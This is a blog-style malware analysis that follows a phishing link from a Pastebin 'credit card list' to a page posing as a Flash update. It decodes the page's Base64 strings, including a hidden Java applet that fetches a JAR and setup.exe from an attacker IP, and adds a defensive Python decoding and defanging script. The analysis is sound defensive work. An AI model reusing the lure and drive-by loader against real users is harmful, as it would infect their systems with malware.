Journey of a Phishing Link

We come across many links on social networking websites and click on a lot of them without thinking. A malicious link can have catastrophic results: the system or your privacy is compromised, or your data takes the hit. This is an analysis of a link dated 17-April-2012 that I came across via Twitter and LinkedIn.

NOTE: All links have been written with the ‘non-clickable’ prefix “hxxp://” to prevent mistaken clicks.

Someone posted this link hxxp://pastebin.com in a tweet. On checking, it was a list of URLs, actually a single URL pasted multiple times – a sign of desperation:

  1. hxxp://tinyurl.com/saw87hujnworeg
  2. hxxp://tinyurl.com/saw87hujnworeg
  3. hxxp://tinyurl.com/saw87hujnworeg
  4. hxxp://tinyurl.com/saw87hujnworeg
    9954 credit card numbers

It states this link has 9954 credit card numbers. The first hint that something is wrong: why paste the same link 4 times in one entry rather than posting it directly?

Next, a target this tempting is hard to leave alone. So I opened the link in Malzilla (hxxp://malzilla.sourceforge.net/), a malware hunting tool, with auto-redirect disabled. The link “hxxp://tinyurl.com/saw87hujnworeg” redirected to “hxxp://212.95.43.243/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b”, which Malzilla displayed as text containing scripts. The page contained only one ‘doubtful’ script plus some headings and titles.

Here is the only important script contained within the page. Let us do the analysis.

This script is hard to follow because of its long variable names, so let us first shorten the variable names for readability. Here is the modified script with short variable names; its logic and behaviour are unchanged.

Now the logic of the script is easy to follow. First, let us decode the strings passed to setTimeout and document.write. They look Base64 encoded, so let us try to decode them. The encoded strings are:

  1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==
  2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=
  3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yMTIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTUxMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9IkxlZ3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2FwcGxldD4=

And the decoded strings are:

  1. Adobe Flash must be updated to view this, please install the latest version!
  2. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
  3. <applet width="0px" height="0px" code="SiteLoader.class"
    archive="hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar">
    <param name="wcZPN"
    value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b">
    <param name="v8TOX" value="setup.exe">
    <param name="Legym" value="www.dogscast.com">
    <param name="MpBDG" value="APPDATA">
    </applet>

The first decoded string is the lure: it tells the victim to install the ‘latest version’ of Flash from the malicious link. The script then issues GET requests to the following links:

  1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
  2. hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar
  3. hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b

And the parameters are:

  1. name="wcZPN"
    value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b"
  2. name="v8TOX" value="setup.exe"
  3. name="Legym" value="www.dogscast.com"
  4. name="MpBDG" value="APPDATA"
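As an added example (not part of the original write-up or its tooling), the following Python performs the decoding step above on the three Base64 strings exactly as copied from this page, defangs the recovered URLs with the hxxp:// convention used here, and pulls the <param> name/value pairs out of the applet tag; `decode_blob`, `defang` and `triage` are names chosen for this example.

```python
import base64
import re

# The three Base64 strings from the script, copied from this write-up with the
# line wraps removed (Python joins the adjacent string literals).
ENCODED = [
    "QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlI"
    "GxhdGVzdCB2ZXJzaW9uIQ==",
    "aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTE"
    "yYzQ4NzVhMGY3NDk2NWI=",
    "DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGF"
    "yY2hpdmU9Imh0dHA6Ly8yM"
    "TIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY"
    "1Yi5qYXIiPg0KCQk8cGFyYW"
    "0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTB"
    "iNzQwZWJjYzJhYmJjNTU"
    "xMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NC"
    "gkJPHBhcmFtIG5hbWU9Ikxl"
    "Z3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2Fwc"
    "GxldD4=",
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
PARAM_RE = re.compile(r'<param\s+name="([^"]*)"\s+value="([^"]*)"', re.I)

def decode_blob(blob):
    """Decode one Base64 string; whitespace left by copy/paste wrapping is dropped first."""
    return base64.b64decode("".join(blob.split()), validate=True).decode("utf-8")

def defang(url):
    """Neutralise a URL for a report using the hxxp:// convention of this write-up."""
    return re.sub(r"^http", "hxxp", url, flags=re.I)

def triage(blobs):
    """Decode every blob; return lure text, defanged URLs (in order, no duplicates)
    and the applet <param> name/value pairs."""
    report = {"lure": [], "urls": [], "params": {}}
    for blob in blobs:
        text = decode_blob(blob)
        for url in URL_RE.findall(text):
            if defang(url) not in report["urls"]:
                report["urls"].append(defang(url))
        report["params"].update(PARAM_RE.findall(text))
        if "<" not in text and not URL_RE.search(text):
            report["lure"].append(text.strip())  # plain text shown to the victim
    return report

if __name__ == "__main__":
    for key, value in triage(ENCODED).items():
        print(f"{key}: {value}")
```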

Let us now access these URLs.

  1. First I accessed the adobe.php URL
    (hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla, and it downloaded a file “Adobe-Flash_WIN.exe” onto my system. The file is approx. 1.16 MB. When scanned via VirusTotal it had a detection rate of 2/42 anti-malware products. Now, this is scary. I did not get a chance to do the runtime analysis of this file, but I will post it in my next blog.
  2. On accessing the second URL
    (hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar), it downloads a JAR file “0b740ebcc2abbc5512c4875a0f74965b.jar”. Extracting it yields a “META-INF” directory and the “SiteLoader.class” file. The contents of META-INF are JUBUHUSE.DSA, JUBUHUSE.SF and MANIFEST.MF.
  3. Now let us analyze the third URL, load.php
    (hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b), via Malzilla. When accessed, this link downloads a “setup.exe” file onto the host. This file is the same as the previous file, as its SHA256 hash “cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5” shows.

This is a brief analysis of a phishing link that started on Twitter as a Pastebin link and made its way onto your system through several files.

Author:

Rishi Narang
Senior Consultant,
Aujas